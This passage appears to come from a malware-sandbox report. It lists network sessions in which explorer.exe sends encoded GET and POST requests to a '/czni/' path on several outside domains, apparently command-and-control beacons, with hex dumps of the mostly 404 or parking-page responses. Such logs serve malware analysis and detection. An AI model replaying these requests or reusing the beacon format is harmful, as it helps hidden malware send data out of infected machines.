65 62 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 77 65 62 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62
                                                                          Data Ascii: 649<!DOCTYPE html><html lang="en"><head> <title>404 PAGE NOT FOUND</title> ... Meta --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta content="width=1200, initial-scale=1" name="viewport"> ... <meta content="viewport" content="width=1200"> --> <meta content="" name="description"> <meta content="" name="author"> ... Favicon --> <link rel="shortcut icon" href="favicon.ico"> ... CSS Global Compulsory --> <link rel="stylesheet" href="css/bootstrap.web.min.css"> <link href="css/responsiveweb.css" rel="stylesheet" type="text/css"></head><body><nav class="navb
                                                                          Jan 30, 2023 13:42:17.855050087 CET1034INData Raw: 61 72 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d
                                                                          Data Ascii: ar"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar"> <span class="icon-bar"></span> <span class="icon-bar"></span>
                                                                          Jan 30, 2023 13:42:17.855070114 CET1034INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.549710194.58.112.17480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:03.305179119 CET758OUTGET /czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.toporsche.online
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:03.364614010 CET760INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:40:03 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 32 61 38 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 6f 70 6f 72 73 63 68 65 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0
                                                                          Data Ascii: 2a88<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.toporsche.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts-content.js')" onerror="window.trackScriptLoad('/head-scripts-content.js', 1)" src="/head-scripts-content.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">
                                                                          Jan 30, 2023 13:40:03.364670038 CET761INData Raw: b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 20 d0 b2 26 6e 62 73 70 3b 3c 61 20 63 6c 61 73 73 3d 22 62 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 67 2e 72 75 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20
                                                                          Data Ascii: &nbsp;<a class="b-link" href="https://reg.ru" rel="nofollow noopener noreferrer" target="_blank">REG.RU</a></div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hostin
                                                                          Jan 30, 2023 13:40:03.364720106 CET762INData Raw: 7a 65 5f 6c 61 72 67 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 62 69 67 40 6c 67 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 62 69 67 40 64 65 73 6b 74 6f 70 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 be d0 b7 d0 b4 d0 b0
                                                                          Data Ascii: ze_large b-title_size_big@lg b-title_size_big@desktop b-parking__title"> c REG.RU</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__p
                                                                          Jan 30, 2023 13:40:03.364768982 CET764INData Raw: d0 bd d0 bd d1 8b d0 b9 20 d0 bf d0 b5 d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73
                                                                          Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" h
                                                                          Jan 30, 2023 13:40:03.364819050 CET765INData Raw: 64 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 74 6f 70 6f 72 73 63 68 65 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61
                                                                          Data Ascii: d/?utm_source=www.toporsche.online&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large
                                                                          Jan 30, 2023 13:40:03.364871979 CET766INData Raw: 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a 65
                                                                          Data Ascii: </p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.toporsche.online&utm_medium=parking&utm_campaign=s_
                                                                          Jan 30, 2023 13:40:03.364919901 CET767INData Raw: 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 6c 2d 6d 61 72 67 69 6e 5f 74 6f 70 2d 73 6d 61 6c 6c 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 72 6d 61 6c
                                                                          Data Ascii: ass="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL- &nbsp;
                                                                          Jan 30, 2023 13:40:03.364969969 CET769INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74
                                                                          Data Ascii: } } } var script = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.toporsche.
                                                                          Jan 30, 2023 13:40:03.365015984 CET770INData Raw: 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 33 38 30 39 30
                                                                          Data Ascii: Layer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          30192.168.2.54974187.236.16.15380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:23.134269953 CET1035OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.hougou.ru
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.hougou.ru
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.hougou.ru/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 42 73 4f 4c 54 71 4b 2d 36 71 57 51 6d 48 41 33 35 73 35 6f 64 54 5a 4c 50 7a 4b 41 4a 6e 56 53 64 63 34 44 71 4c 72 57 51 70 67 43 64 44 75 6a 74 77 62 58 59 2d 78 79 74 46 68 65 65 39 64 75 76 49 4d 45 6e 37 52 6f 61 6f 61 4c 75 6d 56 2d 58 39 7a 4a 75 6b 66 30 63 49 39 6e 32 77 33 6b 54 4f 6c 61 79 50 59 53 45 4e 63 77 49 34 76 33 64 35 75 30 7e 49 63 32 48 50 71 71 35 70 73 52 78 51 46 53 36 6d 73 6f 61 5a 66 2d 62 66 78 37 46 63 36 69 44 77 44 31 52 6d 74 32 6c 31 45 32 67 65 70 7a 74 79 45 38 51 32 48 74 42 61 66 32 5a 41 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=BsOLTqK-6qWQmHA35s5odTZLPzKAJnVSdc4DqLrWQpgCdDujtwbXY-xytFhee9duvIMEn7RoaoaLumV-X9zJukf0cI9n2w3kTOlayPYSENcwI4v3d5u0~Ic2HPqq5psRxQFS6msoaZf-bfx7Fc6iDwD1Rmt2l1E2gepztyE8Q2HtBaf2ZA).
                                                                          Jan 30, 2023 13:42:23.248631001 CET1036INHTTP/1.1 404 Not Found
                                                                          Server: nginx-reuseport/1.21.1
                                                                          Date: Mon, 30 Jan 2023 12:42:23 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f cd 4e c3 30 10 84 ef 79 8a a5 27 38 e0 4d ab 20 71 b0 2c d1 26 15 95 42 89 c0 39 f4 e8 e2 2d 8e 54 e2 e0 1f 02 6f 8f 93 0a 89 cb 4a b3 fb cd 6a 86 5f 95 cf 1b 79 68 2a 78 94 4f 35 34 ed ba de 6d 60 71 8b b8 ab e4 16 b1 94 e5 e5 b2 62 39 62 b5 5f 88 8c 9b f0 71 16 dc 90 d2 49 84 2e 9c 49 14 79 01 7b 1b 60 6b 63 af 39 5e 96 19 c7 19 e2 47 ab 7f 26 df 52 fc 63 92 ca f8 20 a4 21 70 f4 19 c9 07 d2 d0 be d4 30 2a 0f 7d e2 4e 13 07 b6 87 60 3a 0f 9e dc 17 39 c6 71 98 3e b9 34 94 d6 8e bc 17 0f 83 7a 33 84 2b 56 b0 bb 25 5c b7 7d f7 7d 03 af 33 0e 2a c0 38 8e cc d8 f8 6e 23 73 11 1a eb 02 dc e7 1c ff dc 29 e4 1c 2f 05 9a 6a 65 bf 61 a5 f1 01 11 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e6MN0y'8M q,&B9-ToJj_yh*xO54m`qb9b_qI.Iy{`kc9^G&Rc !p0*}N`:9q>4z3+V%\}}3*8n#s)/jea0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          31192.168.2.54974287.236.16.15380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:25.723154068 CET1036OUTGET /czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.hougou.ru
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:25.803071976 CET1037INHTTP/1.1 404 Not Found
                                                                          Server: nginx-reuseport/1.21.1
                                                                          Date: Mon, 30 Jan 2023 12:42:25 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Content-Length: 273
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 6f 75 67 6f 75 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.hougou.ru Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          32192.168.2.54974314.128.47.12680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:32.091612101 CET1038OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1
                                                                          Host: www.panalobet88.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:32.356997013 CET1038INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:42:32 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.549711208.91.197.9180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:08.721944094 CET771OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.chimid.org
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.chimid.org
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.chimid.org/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 6e 36 48 75 74 70 70 51 71 79 55 75 68 37 42 59 58 45 38 52 57 49 53 38 45 68 68 31 32 53 57 6b 6d 48 58 42 68 69 54 72 41 68 65 6f 39 77 78 4f 39 2d 72 35 4f 4b 59 36 65 6d 55 4a 39 56 61 63 39 33 5a 68 53 77 31 79 68 6b 4c 53 6d 61 4e 49 71 64 4e 71 55 46 78 57 6f 49 44 49 39 52 79 69 56 71 67 30 77 6e 44 46 4c 30 4a 6a 34 72 53 62 44 6a 7e 46 42 67 4d 46 49 79 59 48 4a 76 7a 4e 44 36 63 5f 4b 48 55 59 31 58 56 58 56 52 43 6c 4c 48 72 33 42 6e 55 6b 4a 58 6a 5f 6d 36 48 6b 6d 5a 6f 65 4f 7a 5a 36 44 7a 75 67 56 36 71 76 4e 77 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=n6HutppQqyUuh7BYXE8RWIS8Ehh12SWkmHXBhiTrAheo9wxO9-r5OKY6emUJ9Vac93ZhSw1yhkLSmaNIqdNqUFxWoIDI9RyiVqg0wnDFL0Jj4rSbDj~FBgMFIyYHJvzND6c_KHUY1XVXVRClLHr3BnUkJXj_m6HkmZoeOzZ6DzugV6qvNw).


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          5192.168.2.549712208.91.197.9180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:11.394536018 CET772OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=q4vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM/Tg8TnJqujzMrtpKg/UGeVYytsfF/XPvWg== HTTP/1.1
                                                                          Host: www.chimid.org
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:12.377284050 CET773INHTTP/1.1 200 OK
                                                                          Date: Mon, 30 Jan 2023 12:40:11 GMT
                                                                          Server: Apache
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                          Set-Cookie: vsid=919vr4226280122227923; expires=Sat, 29-Jan-2028 12:40:12 GMT; Max-Age=157680000; path=/; domain=www.chimid.org; HttpOnly
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_i6MpecTl/6NqwkSBJ1gTopxy2SMKJIc1l336ZsESpXVwPvBHIBAsm8KXkR940yMsmRxdgsF9z+4a1vNw9SYUTg==
                                                                          Content-Length: 2819
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Connection: close
                                                                          Jan 30, 2023 13:40:12.377315044 CET773INData Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6d 69 64 2e 6f 72 67 2f 3f 66 70 3d 69 77 51 49 75 31 74 6a 52 37 43 6e 5a 47 67 6a 69 50 4d 79 42 34 25 32 42 53 50 46 58 6a 45 6c 63 6f 6f
                                                                          Data Ascii: ...top.location="http://www.chimid.org/?fp=iwQIu1tjR7CnZGgjiPMyB4%2BSPFXjElcooAf1uRDWDv3sSzMeNsXP9Lq%2FtkXLuJOv4fk73cezi%2Fr25cQ2HKdFOrx6Gm7ElDmwEik5AKXzzZTxKC%2Bin7vwGR2%2Fa%2FD%2Fi8z9ocLxrGutgR6
                                                                          Jan 30, 2023 13:40:12.377343893 CET774INData Raw: 41 50 4e 66 41 45 59 49 61 75 66 48 69 63 44 39 47 51 63 4f 43 71 65 45 6f 63 64 49 41 42 6f 38 25 33 44 26 70 72 76 74 6f 66 3d 38 53 58 6a 46 52 31 69 61 68 34 54 39 4f 42 71 74 42 43 48 70 30 4a 51 76 4c 44 76 78 5a 69 78 4c 4d 6a 39 25 32 46
                                                                          Data Ascii: APNfAEYIaufHicD9GQcOCqeEocdIABo8%3D&prvtof=8SXjFR1iah4T9OBqtBCHp0JQvLDvxZixLMj9%2FMbr34M%3D&poru=5YTvFPfqDDyPqPTeAI913D58ZvlPmJt5ZbygKdUK4t7U6haB9nYVdrhXX8vnTco3nvqVMCCEX3EgWKrEWoef2CM5tU1E%2Bcpvs%2BKj9EvZSEkIGl5J9A2IEdBGRemPwTdY1H3TddFyxtA6q3
                                                                          Jan 30, 2023 13:40:12.377372980 CET775INData Raw: 7a 4d 65 4e 73 58 50 39 4c 71 25 32 46 74 6b 58 4c 75 4a 4f 76 34 66 6b 37 33 63 65 7a 69 25 32 46 72 32 35 63 51 32 48 4b 64 46 4f 72 78 36 47 6d 37 45 6c 44 6d 77 45 69 6b 35 41 4b 58 7a 7a 5a 54 78 4b 43 25 32 42 69 6e 37 76 77 47 52 32 25 32
                                                                          Data Ascii: zMeNsXP9Lq%2FtkXLuJOv4fk73cezi%2Fr25cQ2HKdFOrx6Gm7ElDmwEik5AKXzzZTxKC%2Bin7vwGR2%2Fa%2FD%2Fi8z9ocLxrGutgR6APNfAEYIaufHicD9GQcOCqeEocdIABo8%3D&prvtof=k3ZTLwGdKjjzkWb7cmbPuGpODNj6WCjrs6ESb1AJb2o%3D&poru=Gg74Y6M9YCTQAQgLXsr6Y3mMNXFL2sM1eQO6io%2BA
                                                                          Jan 30, 2023 13:40:12.377397060 CET776INData Raw: 76 4f 75 5a 6c 75 32 67 77 33 38 37 56 44 56 31 30 50 44 70 69 57 54 46 6c 32 78 47 32 6d 6a 33 37 6a 35 45 4b 33 45 41 43 61 31 79 78 4d 31 63 4c 43 62 4a 5a 37 51 55 67 43 32 6a 4c 4d 25 32 46 54 67 38 54 6e 4a 71 75 6a 7a 4d 72 74 70 4b 67 25
